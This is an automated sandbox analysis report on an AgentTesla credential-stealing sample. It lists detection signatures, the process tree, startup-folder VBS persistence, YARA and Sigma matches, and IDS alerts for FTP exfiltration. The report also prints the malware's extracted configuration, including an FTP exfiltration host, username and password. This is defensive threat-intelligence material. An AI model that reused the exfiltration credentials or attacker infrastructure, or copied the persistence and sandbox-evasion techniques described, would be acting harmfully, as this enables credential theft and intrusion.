Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SAL987656700.exe

Overview

General Information

Sample name:SAL987656700.exe
Analysis ID:1584881
MD5:a885a9c7468691538b78d54852b5a59c
SHA1:1b2340a366a6b28ac9d30f31bacef95afd0de595
SHA256:d2d196a12c822020c4042d607be77746951b6cb3c16201ff21ca8e9c5c786209
Tags:AgentTeslaexeuser-cocaman
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SAL987656700.exe (PID: 6536 cmdline: "C:\Users\user\Desktop\SAL987656700.exe" MD5: A885A9C7468691538B78D54852B5A59C)
    • cunila.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\SAL987656700.exe" MD5: A885A9C7468691538B78D54852B5A59C)
      • RegSvcs.exe (PID: 2316 cmdline: "C:\Users\user\Desktop\SAL987656700.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 5908 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cunila.exe (PID: 1276 cmdline: "C:\Users\user\AppData\Local\enterogenous\cunila.exe" MD5: A885A9C7468691538B78D54852B5A59C)
      • RegSvcs.exe (PID: 5376 cmdline: "C:\Users\user\AppData\Local\enterogenous\cunila.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000002.4471177683.0000000002B7E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000003.00000002.2189912177.0000000002621000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000002.2189912177.0000000002621000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000003.00000002.2189912177.000000000264E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 22 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              5.2.cunila.exe.39b0000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                5.2.cunila.exe.39b0000.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  5.2.cunila.exe.39b0000.1.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    5.2.cunila.exe.39b0000.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x34735:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x347a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x34831:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x348c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x3492d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x3499f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x34a35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x34ac5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    5.2.cunila.exe.39b0000.1.raw.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                    • 0x3196b:$s2: GetPrivateProfileString
                    • 0x31018:$s3: get_OSFullName
                    • 0x32706:$s5: remove_Key
                    • 0x328b3:$s5: remove_Key
                    • 0x33795:$s6: FtpWebRequest
                    • 0x34717:$s7: logins
                    • 0x34c89:$s7: logins
                    • 0x3798e:$s7: logins
                    • 0x37a4c:$s7: logins
                    • 0x393a1:$s7: logins
                    • 0x385e6:$s9: 1.85 (Hash, version 2, native byte-order)
                    Click to see the 18 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , ProcessId: 5908, ProcessName: wscript.exe
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , ProcessId: 5908, ProcessName: wscript.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\enterogenous\cunila.exe, ProcessId: 7164, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-06T17:03:20.250590+010020299271A Network Trojan was detected192.168.2.549711162.241.62.6321TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-06T17:03:20.644800+010028555421A Network Trojan was detected192.168.2.549714162.241.62.6332929TCP
                    2025-01-06T17:03:20.650314+010028555421A Network Trojan was detected192.168.2.549714162.241.62.6332929TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-06T17:03:20.650314+010018000091A Network Trojan was detected192.168.2.549714162.241.62.6332929TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: SAL987656700.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeAvira: detection malicious, Label: DR/AutoIt.Gen8
                    Found malware configuration
                    Source: 3.2.RegSvcs.exe.3b0000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeReversingLabs: Detection: 44%
                    Multi AV Scanner detection for submitted file
                    Source: SAL987656700.exeReversingLabs: Detection: 44%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: SAL987656700.exeJoe Sandbox ML: detected
                    Source: SAL987656700.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: Binary string: wntdll.pdbUGP source: cunila.exe, 00000002.00000003.2042437840.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000002.00000003.2044375496.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000005.00000003.2177354650.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000005.00000003.2178431472.0000000003D20000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: cunila.exe, 00000002.00000003.2042437840.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000002.00000003.2044375496.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000005.00000003.2177354650.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000005.00000003.2178431472.0000000003D20000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008BC2A2 FindFirstFileExW,0_2_008BC2A2
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008F68EE FindFirstFileW,FindClose,0_2_008F68EE
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_008F698F
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008ED076
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008ED3A9
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008F9642
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008F979D
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_008EDBBE
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_008F9B2B
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008F5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_008F5C97
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0055C2A2 FindFirstFileExW,2_2_0055C2A2
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005968EE FindFirstFileW,FindClose,2_2_005968EE
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0059698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_0059698F
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0058D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0058D076
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0058D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0058D3A9
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_00599642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00599642
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0059979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0059979D
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_00599B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00599B2B
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0058DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_0058DBBE
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_00595C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00595C97
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49711 -> 162.241.62.63:21
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49714 -> 162.241.62.63:32929
                    Source: Network trafficSuricata IDS: 1800009 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Passwords : 192.168.2.5:49714 -> 162.241.62.63:32929
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 5.2.cunila.exe.39b0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.3b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.cunila.exe.3970000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: global trafficTCP traffic: 192.168.2.5:49714 -> 162.241.62.63:32929
                    Source: global trafficTCP traffic: 192.168.2.5:53370 -> 162.159.36.2:53
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 162.241.62.63 162.241.62.63
                    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                    Source: unknownDNS query: name: ip-api.com
                    Source: unknownFTP traffic detected: 162.241.62.63:21 -> 192.168.2.5:49711 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 10:03. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 10:03. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 10:03. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008FCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_008FCE44
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: ftp.antoniomayol.com
                    Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
                    Source: RegSvcs.exe, 00000003.00000002.2189912177.000000000264E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4471177683.0000000002B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://antoniomayol.com
                    Source: RegSvcs.exe, 00000003.00000002.2189912177.000000000264E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4471177683.0000000002B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.antoniomayol.com
                    Source: RegSvcs.exe, 00000003.00000002.2189912177.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4471177683.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: cunila.exe, 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2189912177.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2187681687.0000000000855000.00000004.00000020.00020000.00000000.sdmp, cunila.exe, 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4470758014.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4471177683.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: RegSvcs.exe, 00000003.00000002.2189912177.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4471177683.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: cunila.exe, 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp, cunila.exe, 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 2.2.cunila.exe.3970000.1.raw.unpack, R1W.cs.Net Code: HAg81
                    Source: 5.2.cunila.exe.39b0000.1.raw.unpack, R1W.cs.Net Code: HAg81
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_008FEAFF
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008FED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_008FED6A
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0059ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_0059ED6A
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_008FEAFF
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008EAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_008EAA57
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_00919576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00919576
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005B9576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_005B9576

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 5.2.cunila.exe.39b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.cunila.exe.39b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 5.2.cunila.exe.39b0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.cunila.exe.39b0000.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 3.2.RegSvcs.exe.3b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 3.2.RegSvcs.exe.3b0000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 2.2.cunila.exe.3970000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.cunila.exe.3970000.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 2.2.cunila.exe.3970000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.cunila.exe.3970000.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Binary is likely a compiled AutoIt script file
                    Source: SAL987656700.exeString found in binary or memory: This is a third-party compiled AutoIt script.
